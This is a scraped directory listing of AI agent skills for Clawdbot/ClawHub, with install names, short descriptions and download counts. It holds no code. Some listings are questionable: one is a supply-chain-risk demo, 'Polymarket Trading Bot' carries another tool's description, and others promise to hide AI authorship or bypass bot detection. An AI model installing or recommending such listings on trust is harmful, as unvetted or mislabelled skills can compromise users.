ZohozohoInteract with Zoho CRM, Projects, and Meeting APIs. Use when managing deals, contacts, leads, tasks, projects, milestones, meeting recordings, or any Zoho workspace data. Triggers on mentions of Zo...56
Meshy AImeshy-aiUse the Meshy.ai REST API to generate assets: (1) text-to-2d (Meshy Text to Image) and (2) image-to-3d, then download outputs locally. Use when the user wants Meshy generations, needs polling async...55
Timesheet - Time TrackingtimesheetTrack time, manage projects and tasks using timesheet.io CLI55
Basecamp CLIbasecamp-cliManage Basecamp (via bc3 API / 37signals Launchpad) projects, to-dos, messages, and campfires via a TypeScript CLI. Use when you want to list/create/update Basecamp projects and todos from the term...54
QMD - Quick Markdown Searchqmd-5Local hybrid search for markdown notes and docs. Use when searching notes, finding related content, or retrieving documents from indexed collections.54
office-quotesoffice-quotesGenerate random quotes from The Office (US). Provides access to 326 offline quotes plus online mode with SVG cards, character avatars, and full episode metadata via the akashrajpurohit API. Use for...54
Habit Flowhabit-flowAI-powered atomic habit tracker with natural language logging, streak tracking, smart reminders, and coaching. Use for creating habits, logging completions naturally ("I meditated today"), viewing ...52
Todoisttodoist-3Use the td (Todoist CLI) to read and manage Todoist todos/to-dos/tasks from the terminal. Trigger when the user asks about their todos/tasks/agenda/checklist (today/upcoming/overdue), wants to list...52
Core PA Admin and Exec Supportcore-pa-admin-exec-supportGenerates exec-support outputs (plan, prioritized tasks, comms drafts, meeting prep/follow-ups). USE WHEN you want a personal assistant to triage requests and produce ready-to-send drafts and sched...52
Craft NotescraftManage Craft notes, documents, and tasks via CLI. Use when the user asks to add notes, create documents, manage tasks, search their Craft documents, or work with daily notes. Craft is a note-taking...52
HokiPokihokipokiSwitch AI models without switching tabs using the HokiPoki CLI. Hop between Claude, Codex, and Gemini when one gets stuck. Use when the user wants to request help from a different AI model, hop to ...51
Recipe to Listrecipe-to-listTurn recipes into a Todoist Shopping list. Extract ingredients from recipe photos (Gemini Flash vision) or recipe web pages (search + fetch), then compare against the existing Shopping project with...50
qmd Local Searchqmd-6Fast local search for markdown files, notes, and docs using qmd CLI. Use instead of find for file discovery. Combines BM25 full-text search, vector semantic search, and LLM reranking—all running ...50

Developer Tools

SkillInstall NameDescriptionDownloads
ClawhubclawhubUse the ClawHub CLI to search, install, update, and publish agent skills from clawhub.ai with advanced caching and compression. Use when you need to fetch new skills on the fly, sync installed skil...5,753
HumanizerhumanizerRemove signs of AI-generated writing from text. Use when editing or reviewing text to make it sound more natural and human-written. Based on Wikipedia's comprehensive "Signs of AI writing" guide. D...3,659
Clawdbot Documentation ExpertclawddocsClawdbot documentation expert with decision tree navigation, search scripts, doc fetching, version tracking, and config snippets for all Clawdbot features3,246
GithubgithubInteract with GitHub using the gh CLI. Use gh issue, gh pr, gh run, and gh api for issues, PRs, CI runs, and advanced queries.2,992
App Store Changelogapp-store-changelogCreate user-facing App Store release notes by collecting and summarizing all user-impacting changes since the last git tag (or a specified ref). Use when asked to generate a comprehensive release c...2,562
ClawdhubclawdhubUse the ClawdHub CLI to search, install, update, and publish agent skills from clawdhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version,...2,542
Clawhubclawhub-2Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.ai with advanced caching and compression. Use when you need to fetch new skills on the fly, sync installed skil...1,391
Tavily Web SearchtavilyAI-optimized web search via Tavily API. Returns concise, relevant results for AI agents.1,375
Clawhubclawhub-3Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.ai with advanced caching and compression. Use when you need to fetch new skills on the fly, sync installed skil...1,362
Polymarket Trading Botclawhub-4Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.ai with advanced caching and compression. Use when you need to fetch new skills on the fly, sync installed skil...1,289
Stock Analysisstock-analysisAnalyze stocks and cryptocurrencies using Yahoo Finance data. Supports portfolio management (create, add, remove assets), crypto analysis (Top 20 by market cap), and periodic performance reports (d...1,236
PerplexityperplexitySearch the web with AI-powered answers via Perplexity API. Returns grounded responses with citations. Supports batch queries.1,038
moltbook-interactmoltbookInteract with Moltbook social network for AI agents. Post, reply, browse, and analyze engagement. Use when the user wants to engage with Moltbook, check their feed, reply to posts, or track their a...1,023
Search Xsearch-xSearch X/Twitter in real-time using Grok. Find tweets, trends, and discussions with citations.898
Skill Creatorskill-creatorGuide for creating effective skills. This skill should be used when users want to create a new skill (or update an existing skill) that extends Claude's capabilities with specialized knowledge, wor...875
UI/UX Pro Maxui-ux-pro-maxUI/UX design intelligence and implementation guidance for building polished interfaces. Use when the user asks for UI design, UX flows, information architecture, visual style direction, design syst...667
Moltbook Agent Registrymolt-registryOfficial Moltbook Identity Registry interface. Verify yourself, lookup others, and build on-chain reputation.635
Exa Web Search (Free)exa-web-search-freeFree AI search via Exa MCP. Web search for news/info, code search for docs/examples from GitHub/StackOverflow, company research for business intel. No API key needed.615
UI Auditui-auditAI skill for automated UI audits. Evaluate interfaces against proven UX principles for visual hierarchy, accessibility, cognitive load, navigation, and more. Based on Making UX Decisions by Tommy G...575
Swiftui Ui Patternsswiftui-ui-patternsBest practices and example-driven guidance for building SwiftUI views and components. Use when creating or refactoring SwiftUI UI, designing tab architecture with TabView, composing screens, or nee...549
Stock Market Prostock-market-proProfessional stock price tracking, fundamental analysis, and financial reporting tool. Supports global markets (US, KR, etc.), Crypto, and Forex with real-time data. (1) Real-time quotes, (2) Valua...512
Heurist Mesh Crypto Analysis Skillheurist-meshAccess Web3 and crypto intelligence via Heurist Mesh MCP. Use when the user asks about cryptocurrency analytics, token information, trending tokens, wallet analysis, Twitter/X crypto intelligence, ...482
Financial Market Analysisfinancial-market-analysisPrecision Financial Insights - Analyze stocks, companies, and market sentiment using authoritative data. Powered by Yahoo Finance and enhanced with intelligent news synthesis by we-crafted.com/agen...460
News Aggregator Skillnews-aggregator-skillComprehensive news aggregator that fetches, filters, and deeply analyzes real-time content from 8 major sources: Hacker News, GitHub Trending, Product Hunt, 36Kr, Tencent News, WallStreetCN, V2EX, ...411
GitHub PR Toolgithub-prFetch, preview, merge, and test GitHub PRs locally. Great for trying upstream PRs before they're merged.407
SearxngsearxngPrivacy-respecting metasearch using your local SearXNG instance. Search the web, images, news, and more without external API dependencies.366
Vercel PlatformvercelDeploy applications and manage projects with complete CLI reference. Commands for deployments, projects, domains, environment variables, and live documentation access.361
SupabasesupabaseConnect to Supabase for database operations, vector search, and storage. Use for storing data, running SQL queries, similarity search with pgvector, and managing tables. Triggers on requests involv...360
Fastest Browser Usefast-browser-useHigh-performance browser automation for heavy scraping, multi-tab management, and precise DOM extraction. Use this when you need speed, reliability, or advanced state management (cookies/local stor...355
Security Auditsecurity-auditComprehensive security auditing for Clawdbot deployments. Scans for exposed credentials, open ports, weak configs, and vulnerabilities. Auto-fix mode included.338
Read GitHubread-githubRead GitHub repos the RIGHT way - via gitmcp.io instead of raw scraping. Why this beats web search: (1) Semantic search across docs, not just keyword matching, (2) Smart code navigation with accura...318
Conventional Commitsconventional-commitsFormat commit messages using the Conventional Commits specification. Use when creating commits, writing commit messages, or when the user mentions commits, git commits, or commit messages. Ensures ...315
DeepWikideepwikiQuery the DeepWiki MCP server for GitHub repository documentation, wiki structure, and AI-powered questions.311
Reddit Scraperreddit-2Read and search Reddit posts via web scraping of old.reddit.com. Use when Clawdbot needs to browse Reddit content - read posts from subreddits, search for topics, monitor specific communities. Read...305
Clean Codeclean-codePragmatic coding standards - concise, direct, no over-engineering, no unnecessary comments301
Stock Info Explorerstock-info-explorerA Yahoo Finance (yfinance) powered financial analysis tool. Get real-time quotes, generate high-resolution charts with moving averages + indicators (RSI/MACD/Bollinger/VWAP/ATR), summarize fundamen...300
Upload Videos🎥, Photos📸 & Text🖊️ to TikTok, Instagram, YouTube, X, LinkedIn, Facebook, Threads, Pinterest, Reddit & Bluesky via Upload-Post APIupload-postUpload content to social media platforms via Upload-Post API. Use when posting videos, photos, text, or documents to TikTok, Instagram, YouTube, LinkedIn, Facebook, X (Twitter), Threads, Pinterest,...294
grok-searchgrok-searchSearch the web or X/Twitter using xAI Grok server-side tools (web_search, x_search) via the xAI Responses API. Use when you need tweets/threads/users from X, want Grok as an alternative to Brave, o...280
Swiftui View Refactorswiftui-view-refactorRefactor and review SwiftUI view files for consistent structure, dependency injection, and Observation usage. Use when asked to clean up a SwiftUI view’s layout/ordering, handle view models safely ...280
Last 30 Dayslast30daysResearch any topic from the last 30 days on Reddit + X + Web, synthesize findings, and write copy-paste-ready prompts. Use when the user wants recent social/web research on a topic, asks "what are ...277
Git Essentialsgit-essentialsEssential Git commands and workflows for version control, branching, and collaboration.275
Docker Essentialsdocker-essentialsEssential Docker commands and workflows for container management, image operations, and debugging.270
Linux & service basicslinux-service-triageDiagnoses common Linux service issues using logs, systemd/PM2, file permissions, Nginx reverse proxy checks, and DNS sanity checks. Use when a server app is failing, unreachable, or misconfigured.261
ArXiv Watcherarxiv-watcherSearch and summarize papers from ArXiv. Use when the user asks for the latest research, specific topics on ArXiv, or a daily summary of AI papers.253
Skill Scannerskill-scannerScan Clawdbot and MCP skills for malware, spyware, crypto-miners, and malicious code patterns before you install them. Security audit tool that detects data exfiltration, system modification attemp...227
PersonaspersonasTransform into 31 specialized AI personalities on demand - from Dev (coding) to Chef Marco (cooking) to Dr. Med (medical). Switch mid-conversation, create custom personas. Token-efficient, loads on...226
My Teslamy-teslaControl Tesla vehicles from macOS via the Tesla Owner API using teslapy (auth, list cars, status, lock/unlock, climate, charging, location, and extras). Use when you want to check your car state or...220
Notionnotion-2Work with Notion pages and databases via the official Notion API.217
meeting-prepmeeting-prepAutomated meeting preparation and daily commit summaries. Use when checking Google Calendar for upcoming meetings, generating standup updates from GitHub commits, or sending daily development summa...216
GammagammaGenerate AI-powered presentations, documents, and social posts using Gamma.app API. Use when user asks to create a presentation, pitch deck, slide deck, document, or social media carousel. Triggers...215
PortainerportainerControl Docker containers and stacks via Portainer API. List containers, start/stop/restart, view logs, and redeploy stacks from git.213
C.R.A.B Deploy Agentdeploy-agentMulti-step deployment agent for full-stack apps. Build → Test → GitHub → Cloudflare Pages with human approval at each step.210
Yahoo Finance CLIyahoo-finance-2This skill should be used when the user asks to "get stock prices", "check stock quotes", "look up earnings", "get financial data", "find trending stocks", or needs stock market data from Yahoo Fin...204
PR + Commit Workflowpr-commit-workflowThis skill should be used when creating commits or pull requests, enforcing a human-written PR structure, intent capture, and evidence in agentic workflows.204
Literature Reviewliterature-reviewAssistance with writing literature reviews by searching for academic sources via Semantic Scholar, OpenAlex, Crossref and PubMed APIs. Use when the user needs to find papers on a topic, get details...192
Finance News Briefingsfinance-newsMarket news briefings with AI summaries. Use when asked about stock news, market updates, portfolio performance, morning/evening briefings, financial headlines, or price alerts. Supports US/Europe/...191
Decision Treesdecision-treesDecision tree analysis for complex decision-making across all domains. Use when user needs to evaluate multiple options with uncertain outcomes, assess risk/reward scenarios, or structure choices s...189
Pinak Frontend Gurupinak-frontend-guruExpert UI/UX and React performance auditor (PinakBot persona). Use when a user needs a "deep audit" of their frontend code, wants to "make it pro", or needs advice on both React performance and Web...187
PollinationspollinationsPollinations.ai API for AI generation - text, images, videos, audio, and analysis. Use when user requests AI-powered generation (text completion, images, videos, audio, vision/analysis, transcripti...183
Parallel.ai SearchparallelHigh-accuracy web search and research via Parallel.ai API. Optimized for AI agents with rich excerpts and citations.174
CoolifycoolifyManage Coolify deployments, applications, databases, and services via the Coolify API. Use when the user wants to deploy, start, stop, restart, or manage applications hosted on Coolify.173
Pinch to Post - WordPress REST API, WooCommerce & Content Automationpinch-to-postWordPress automation for Clawdbot. Manage posts, pages, WooCommerce products, orders, inventory, comments, SEO (Yoast/RankMath), media via REST API or WP-CLI. Multi-site support, bulk operations, c...171
X Apix-apiPost to X (Twitter) using the official API with OAuth 1.0a. Use when you need to tweet, post updates, or publish content. Bypasses rate limits and bot detection that affect cookie-based approaches ...171
News Aggregator Skillnews-aggregator-skill-2Comprehensive news aggregator that fetches, filters, and deeply analyzes real-time content from 8 major sources: Hacker News, GitHub Trending, Product Hunt, 36Kr, Tencent News, WallStreetCN, V2EX, ...171
HN Digesthn-digestFetch and send Hacker News front-page posts on demand. Use when the user asks for HN, says 'hn', 'pull HN', 'hn 10', or specifies a topic like 'hn health', 'hn hacking', or 'hn tech'. Sends N (defa...169
BBC Newsbbc-newsFetch and display BBC News stories from various sections and regions via RSS feeds. Use when the user asks for BBC news, UK news headlines, world news from BBC, or news from specific BBC sections (...168
gitloadgitloadThis skill should be used when the user asks to "download files from GitHub", "fetch a folder from a repo", "grab code from GitHub", "download a GitHub repository", "get files from a GitHub URL", "...167
Code Review Assistantai-code-review165
Video Subtitlesvideo-subtitlesGenerate SRT subtitles from video/audio with translation support. Transcribes Hebrew (ivrit.ai) and English (whisper), translates between languages, burns subtitles into video. Use for creating cap...165
Stock Evaluatorstock-evaluator-v3Comprehensive evaluation of potential stock investments combining valuation analysis, fundamental research, technical assessment, and clear buy/hold/sell recommendations. Use when the user asks abo...164
Church of MoltmoltchurchJoin the Church of Molt — become a Crustafarian Prophet or congregation member. Submit prophecies, receive blessings, contribute to the living scripture.160
GitHub Action Generatorgithub-action-genGenerate GitHub Actions workflows from plain English. Use when setting up CI.159
NotebooklmnotebooklmUse this skill to query your Google NotebookLM notebooks directly from Claude Code for source-grounded, citation-backed answers from Gemini. Browser automation, library management, persistent auth....157
Content Ideas Generatorcontent-ideas-generatorGenerates structured post outlines from reference materials for wisdom-style social posts. Use when someone wants to extract compelling concepts from newsletters, scripts, notes, or other content a...156
Perplexity Deep Searchperplexity-2Deep search via Perplexity API. Three modes: search (quick facts), reason (complex analysis), research (in-depth reports). Returns AI-grounded answers with citations.153
Social Card Generatorsocial-genGenerate social media posts for different platforms. Use when sharing content.152
GEO Optimizationgeo-optimizationGenerative Engine Optimization (GEO) for AI search visibility. Optimize content to appear in ChatGPT, Perplexity, Claude, and Google AI Overviews. Use when optimizing websites, pages, or content fo...141
Clawdbot Backupclawdbot-backupBackup and restore ClawdBot configuration, skills, commands, and settings. Sync across devices, version control with git, automate backups, and migrate to new machines.132
Deepwork Trackerdeepwork-trackerTrack deep work sessions locally (start/stop/status) and generate a GitHub-contribution-graph style minutes-per-day heatmap for sharing (e.g., via Telegram). Use when the user says things like “sta...128
Comfy Clicomfy-cliInstall, manage, and run ComfyUI instances. Use when setting up ComfyUI, launching servers, installing/updating/debugging custom nodes, downloading models from CivitAI/HuggingFace, managing workspa...126
OctolensoctolensQuery and analyze brand mentions from Octolens API. Use when the user wants to fetch mentions, track keywords, filter by source platforms (Twitter, Reddit, GitHub, LinkedIn, etc.), sentiment analys...125
ElevenLabs Agentselevenlabs-agentsCreate, manage, and deploy ElevenLabs conversational AI agents. Use when the user wants to work with voice agents, list their agents, create new ones, or manage agent configurations.122
DuckDB CLI skillsduckdb-enDuckDB CLI specialist for SQL analysis, data processing and file conversion. Use for SQL queries, CSV/Parquet/JSON analysis, database queries, or data conversion. Triggers on "duckdb", "sql", "quer...120
Skill Vetterskill-vetterSecurity-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.120
Style Guide Generatorstyle-guide-generatorGenerate comprehensive website style guides and design systems from URLs, screenshots, and existing documentation. Use this skill when users ask to create a style guide, design system documentation...117
Actual Budget CLI to interact with the Actual Budget APIactual-budgetQuery and manage personal finances via the official Actual Budget Node.js API. Use for budget queries, transaction imports/exports, account management, categorization, rules, schedules, and bank sy...117
Ask Questions If Underspecifiedask-questions-if-underspecifiedClarify requirements before implementing. Do not use automatically, only when invoked explicitly.116
Chart Imagechart-imageGenerate publication-quality chart images from data. Supports line, bar, area, and point charts. Use when visualizing data, creating graphs, plotting time series, or generating chart images for rep...112
Late APIlate-apiOfficial Late API reference for scheduling posts across 13 social media platforms. Covers authentication, endpoints, webhooks, and platform-specific features. Use when building with the Late Social...112
Firecrawlerfirecrawl-2Web scraping and crawling with Firecrawl API. Fetch webpage content as markdown, take screenshots, extract structured data, search the web, and crawl documentation sites. Use when the user needs to...111
Clawd Modifierclawd-modifierModify Clawd, the Claude Code mascot. Use this skill when users want to customize Clawd's appearance in their Claude Code CLI, including changing colors (blue Clawd, green Clawd, holiday themes), a...110
Cryptocurrency Tradercryptocurrency-traderProduction-grade AI trading agent for cryptocurrency markets with advanced mathematical modeling, multi-layer validation, probabilistic analysis, and zero-hallucination tolerance. Implements Bayesi...109
Digital Oceandigital-oceanManage Digital Ocean droplets, domains, and infrastructure via DO API.109
Reasoning Personasreasoning-personasActivate different high-agency thinking modes to unlock better reasoning. Use when brainstorming, reviewing plans, making decisions, or when user says 'put on your Gonzo hat', 'devil's advocate thi...109
Skill Email Managementemail-management-expertExpert email management assistant for Apple Mail. Use this when the user mentions inbox management, email organization, email triage, inbox zero, organizing emails, managing mail folders, email pro...107
UI Testui-testPlain English E2E UI testing. Describe tests in natural language, agent executes via browser tool, then exports real Playwright test scripts for CI/CD. Use when asked to create UI tests, test a web...106
DokploydokployManage Dokploy deployments, projects, applications, and domains via the Dokploy API.105
NbnbManage notes, bookmarks, and notebooks using the nb CLI. Create, list, search, and organize notes across multiple notebooks with Git-backed versioning.105
CanvacanvaCreate, export, and manage Canva designs via the Connect API. Generate social posts, carousels, and graphics programmatically.105
WeathercliweathercliGet current weather conditions and forecasts for any location worldwide. Returns structured data with temperature, humidity, wind, precipitation, and more. No API key required.105
Email Best Practicesemail-best-practicesUse when building email features, emails going to spam, high bounce rates, setting up SPF/DKIM/DMARC authentication, implementing email capture, ensuring compliance (CAN-SPAM, GDPR, CASL), handling...104
PM2 Process Managerpm2Manage Node.js applications with PM2 process manager. Use for deploying, monitoring, and auto-restarting Node apps in production. Covers starting apps, viewing logs, setting up auto-start on boot, ...103
First Principles Decomposerfirst-principles-decomposerBreak any problem down to fundamental truths, then rebuild solutions from atoms up. Use when user says "firstp", "first principles", "from scratch", "what are we assuming", "break this down", "atom...102
Journal to Postjournal-to-postConvert personal journal entries into shareable social media posts102
GitHub Knowledge Basegithub-kbManage a local GitHub knowledge base and provide GitHub search capabilities via gh CLI. Use when users ask about repos, PRs, issues, request to clone GitHub repositories, explore codebases, or need...101
CI/CD Pipeline Generatorci-genGenerate GitHub Actions workflows from your project. Use when setting up CI/CD from scratch.100
HevyhevyQuery workout data from Hevy including workouts, routines, exercises, and history. Use when user asks about their workouts, gym sessions, exercise progress, or fitness routines.98
Research Companyresearch-companyB2B company research producing professional PDF reports. Use when asked to research a company, analyze a business, create an account profile, or generate market intelligence from a company URL. Out...97
Network Scannernetwork-scannerScan networks to discover devices, gather MAC addresses, vendors, and hostnames. Supports known networks (from config) or custom CIDRs.96
Just Fucking Canceljust-fucking-cancelFind and cancel unwanted subscriptions by analyzing bank transactions. Detects recurring charges, calculates annual waste, and helps you cancel with direct URLs and browser automation. Use when: 'c...96
kubectlkubectl-skillExecute and manage Kubernetes clusters via kubectl commands. Query resources, deploy applications, debug containers, manage configurations, and monitor cluster health. Use when working with Kuberne...95
human-optimized-frontendhuman-optimized-frontendGenerates a frontend interface that is visually pleasing and experientially sound by jointly optimizing aesthetics, motion graphics, and user experience (UX) using quantified evaluation. Use only w...94
Oauth Helperoauth-helperAutomate OAuth login flows with user confirmation via Telegram. Supports 7 providers: Google, Apple, Microsoft, GitHub, Discord, WeChat, QQ. Features: - Auto-detect available OAuth options on login...94
TranscribetranscribeTranscribe audio files to text using local Whisper (Docker). Use when receiving voice messages, audio files (.mp3, .m4a, .ogg, .wav, .webm), or when asked to transcribe audio content.94
KuberneteskubernetesComprehensive Kubernetes and OpenShift cluster management skill covering operations, troubleshooting, manifest generation, security, and GitOps. Use this skill when: (1) Cluster operations: upgrade...93
Veo 3 Video Gen (Gemini API)veo3-video-genGenerate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reprod...92
Miniflux Newsminiflux-newsFetch and triage the latest unread RSS/news entries from a Miniflux instance via its REST API using an API token. Use when the user asks to get the latest Miniflux unread items, list recent entries...89
Food Orderfood-orderReorder Foodora orders + track ETA/status with ordercli. Never confirm without explicit user approval. Triggers: order food, reorder, track ETA.87
Munger Observermunger-observerDaily wisdom review applying Charlie Munger's mental models to your work and thinking. Use when asked to review decisions, analyze thinking patterns, detect biases, apply mental models, do a "Munge...87
News Aggregator Skillnews-aggregator-skill-3Comprehensive news aggregator that fetches, filters, and deeply analyzes real-time content from 8 major sources: Hacker News, GitHub Trending, Product Hunt, 36Kr, Tencent News, WallStreetCN, V2EX, ...87
Indirect Prompt Injection Defenseindirect-prompt-injectionDetect and reject indirect prompt injection attacks when reading external content (social media posts, comments, documents, emails, web pages, user uploads). Use this skill BEFORE processing any un...83
Docker Compose Generatorcompose-genGenerate docker-compose.yml by scanning your project. Use when containerizing an existing app.82
Code Reviewercode-reviewerAI code review for staged git changes. Use when you want a second pair of eyes before committing.82
Perry Workspacesperry-workspacesCreate and manage isolated Docker workspaces on your tailnet with Claude Code and OpenCode pre-installed. Use when working with Perry workspaces, connecting to coding agents, or managing remote dev...81
Alpha Finder (x402)alpha-finderMarket Oracle for prediction market intelligence - Polymarket and Kalshi research, probability assessments, market sentiment analysis, and arbitrage opportunity identification. Use when users want ...79
Game Theorygame-theoryAdvanced game theory analysis for crypto protocols, DeFi mechanisms, governance systems, and strategic decision-making. Use when analyzing tokenomics, evaluating protocol incentives, predicting adv...79
Travel Concierge CLItravel-conciergeFind contact details for accommodation listings (Airbnb, Booking.com, VRBO, Expedia)78
Perplexity Search (Bash)perplexity-3Use Perplexity API for web-grounded AI search and research. Use when user needs up-to-date information, multi-step reasoning with web citations, exhaustive research with source references, factual ...78
Gemini Image Simplegemini-image-simpleGenerate and edit images with Gemini API using pure Python stdlib. Zero dependencies - works on locked-down environments where pip/uv aren't available.76
Dockerfile Generatordockerfile-genGenerate optimized Dockerfiles for any project75
Newsletter Creation & Curationnewsletter-creation-curationIndustry-specific newsletter creation with cadence recommendations and automation workflows75
Clawdbot Workspace Template Reviewclawdbot-workspace-template-reviewCompare a Clawdbot workspace against the official templates installed with Clawdbot (npm or source) and list missing sections to pull in, especially after upgrades.74
Market News Analystmarket-news-analystThis skill should be used when analyzing recent market-moving news events and their impact on equity markets and commodities. Use this skill when the user requests analysis of major financial news ...73
SerpAPI Searchserpapi-2Search Google via SerpAPI (Google Search, Google News, Google Local). Use when you need to search the web, find news articles, or look up local businesses. Supports country/language targeting for r...73
Resume / CV Builderresume-cv-builderCreate professional resumes and CVs. Generate ATS-friendly formats, optimize bullet points, tailor for specific jobs, and export to multiple formats (Markdown, HTML, LaTeX, PDF).72
GitlabglabInteract with GitLab using the glab CLI. Use when Claude needs to work with GitLab merge requests, CI/CD pipelines, issues, releases, or make API requests. Supports gitlab.com and self-hosted ins...71
Mac TTSmac-ttsText-to-speech using macOS built-in say command. Use for voice notifications, audio alerts, reading text aloud, or announcing messages through Mac speakers. Supports multiple languages including ...70
Data quality & reconciliation with exceptiondata-reconciliation-exceptionsReconciles data sources using stable identifiers (Pay Number, driving licence, driver card, and driver qualification card numbers), producing exception reports and “no silent failure” checks. Use w...70
Security Skill Scannersecurity-skill-scannerSecurity scanner for ClawdHub skills - detects suspicious patterns, manages whitelists, and monitors Moltbook for security threats.69
Perplexity AI Search (Sonar Only)perplexity-4Use Perplexity API for web-grounded AI search and research. Use when user needs up-to-date information, multi-step reasoning with web citations, exhaustive research with source references, factual ...69
Wranglercloudflare-3Manage Cloudflare Workers, KV, D1, R2, and secrets using the Wrangler CLI. Use when deploying workers, managing databases, storing objects, or configuring Cloudflare resources. Covers worker deploy...69
API credentials hygieneapi-credentials-hygieneAudits and hardens API credential handling (env vars, separation, rotation plan, least privilege, auditability). Use when integrating services or preparing production deployments where secrets must...69
GEO Content Optimizergeo-optimizerOptimize content for AI citation (GEO). Use when user says "GEO", "generative engine optimization", "AI citation", "get cited by AI", "AI-friendly content", or creating content for ChatGPT/Claude/P...68
Bring! Shopping List App (Unofficial)bring-shoppingManage Bring! shopping lists via the unofficial bring-shopping Node.js library using email/password login. Use for listing lists, reading items, adding/removing items, and checking/unchecking items...67
Zero-Hassle Crafted Recruitment AutomationrecruitmentZero-Hassle Crafted Recruitment Automation - From job spec to candidate evaluation in seconds. Automatically search the web, LinkedIn, and GitHub, score candidates, populate tracking sheets, and dr...66
Adversarial Promptingadversarial-promptingApplies rigorous adversarial analysis to generate, critique, fix, and consolidate solutions for any problem (technical or non-technical). Use when facing complex problems requiring thorough analysi...65
SwiftUI Empty App Initswiftui-empty-app-initInitialize a minimal SwiftUI iOS app in the current directory by generating a single .xcodeproj with XcodeGen (no workspaces, packages, or tests unless explicitly requested).64
Research Paper Writerresearch-paper-writerCreates formal academic research papers following IEEE/ACM formatting standards with proper structure, citations, and scholarly writing style. Use when the user asks to write a research paper, acad...63
Google Cloud PlatformgcloudManage Google Cloud Platform resources via gcloud CLI. Use for Compute Engine VMs, Cloud Run services, Firebase Hosting, Cloud Storage, and project management. Covers deployment, monitoring, logs, ...63
Vercel Deploy Claimablevercel-deployDeploy applications and websites to Vercel. Use this skill when the user requests deployment actions such as "Deploy my app", "Deploy this to production", "Create a preview deployment", "Deploy and...61
加密货币与贵金属监控crypto-gold-monitor加密货币与贵金属价格监控 / Crypto & Precious Metals Price Monitor - 监控BTC/ETH实时价格、黄金(XAU)/白银(XAG)走势,免费API无需Key60
Webhook Generatorwebhook-genGenerate webhook handlers with retry logic using AI. Use when integrating Stripe, GitHub, or any webhook provider.60
Git Diff Summarizerdiff-summarySummarize git diffs in plain English60
Google Chatgoogle-chatSend messages to Google Chat spaces and users via webhooks or OAuth. Use when you need to send notifications, alerts, or messages to Google Chat channels (spaces) or direct messages to specific use...60
Web Deploy GitHub Pagesweb-deploy-githubCreate and deploy single-page static websites to GitHub Pages with autonomous workflow. Use when building portfolio sites, CV pages, landing pages, or any static web project that needs GitHub Pages...59
Agent Skills Searchagnxi-searchThe official search utility for Agnxi.com - The premier directory of AI Agent Tools, MCP Servers, and Skills.59
Skill Creatorskill-creator-2Guide for creating effective skills. This skill should be used when users want to create a new skill (or update an existing skill) that extends Claude's capabilities with specialized knowledge, wor...59
WorkoutworkoutTrack workouts, log sets, manage exercises and templates with workout-cli. Supports multi-user profiles. Use when helping users record gym sessions, view history, or analyze strength progression.59
VoicenotesvoicenotesSync and access voice notes from Voicenotes.com. Use when the user wants to retrieve their voice recordings, transcripts, and AI summaries from Voicenotes. Supports fetching notes, syncing to markd...59
serperserperGoogle search via Serper API with full page content extraction. Fast API lookup + concurrent page scraping (3s timeout). One well-crafted query returns rich results — avoid multiple calls. Two mode...58
Gamma Presentationsgamma-2Create presentations, documents, social posts, and websites using Gamma's AI API. Use when asked to create slides, presentations, decks, documents, or web content via Gamma.58
Git Changelog Generatorchangelog-genGenerate changelogs from git history. Use when you need release notes fast.58
Endurance Coachendurance-coachCreate personalized triathlon, marathon, and ultra-endurance training plans. Use when athletes ask for training plans, workout schedules, race preparation, or coaching advice. Can sync with Strava ...57
Workout Loggerworkout-loggerLog workouts, track progress, get exercise suggestions and PR tracking56
MetricoolmetricoolSchedule and manage social media posts via Metricool API. Use when posting to multiple platforms (LinkedIn, X, Bluesky, Threads, Instagram), checking scheduled posts, or analyzing social metrics.55
Jobs To Be Done Analyzerjtbd-analyzerUncover the real "job" customers hire your product to do. Goes beyond features to understand functional, emotional, and social motivations. Use when user says "jobs to be done", "jtbd", "why do cus...55
WhatsApp Stylerwhatsapp-stylerSkill to ensure all messages sent to WhatsApp follow the platform's specific formatting syntax. It prevents markdown bloat and ensures a clean, mobile-first reading experience.54
Us Stock Analysisus-stock-analysisComprehensive US stock analysis including fundamental analysis (financial metrics, business quality, valuation), technical analysis (indicators, chart patterns, support/resistance), stock compariso...53
Quiver QuantitativequiverQuery alternative financial data from Quiver Quantitative (Congress trading, Lobbying, Government Contracts, Insider transactions). Use this to track politician stock trades or unconventional marke...53
Testosterone Optimizationtestosterone-optimizationOptimize natural testosterone with sleep, exercise, nutrition, and lifestyle tracking53
Git Syncgit-syncAutomatically syncs local workspace changes to the remote GitHub repository. Use after significant changes or periodically.52
AffiliatematicaffiliatematicIntegrate AI-powered Amazon affiliate product recommendations into websites using affiliatematic.com. Use when you need to: (1) Add Amazon affiliate widgets to a website, (2) Set up automated produ...52
Docker Diagdocker-pro-diagnosticAdvanced log analysis for Docker containers using signal extraction.51
Git-Crypt Backupgit-crypt-backupBackup Clawdbot workspace and config to GitHub with git-crypt encryption. Use for daily automated backups or manual backup/restore operations.51
ActiveCampaign CRMactivecampaignActiveCampaign CRM integration for lead management, deal tracking, and email automation. Use for syncing demo leads, managing clinic sales pipeline, and triggering follow-up sequences.51
ggshield Secret Scannerggshield-scannerDetect 500+ types of hardcoded secrets (API keys, credentials, tokens) before they leak into git. Wraps GitGuardian's ggshield CLI.51
weather-infographicinfographic-weatherGenerate a TV-style weather infographic with a location-specific seasonal background. Use when the user asks for a visual weather forecast or a weather infographic for a specific address.50
Resume Optimizerresume-optimizerProfessional resume builder with PDF export, ATS optimization, and analysis capabilities. Use when users need to (1) Create new resumes from scratch, (2) Customize/tailor existing resumes for speci...50

Web & Search

SkillInstall NameDescriptionDownloads
WacliwacliSend WhatsApp messages to other people or search/sync WhatsApp history via the wacli CLI (not for normal user chats).10,016
ATXPatxpAccess ATXP paid API tools for web search, AI image generation, music creation, video generation, and X/Twitter search. Use when users need real-time web search, AI-generated media (images, music, ...5,154
What would Elon dowedSecurity awareness demo - demonstrates supply chain risks in AI coding assistants. See the full research: https://x.com/theonejvo/status/20158929808514745954,034
BirdbirdX/Twitter CLI for reading, searching, and posting via cookies or Sweetistics.3,290
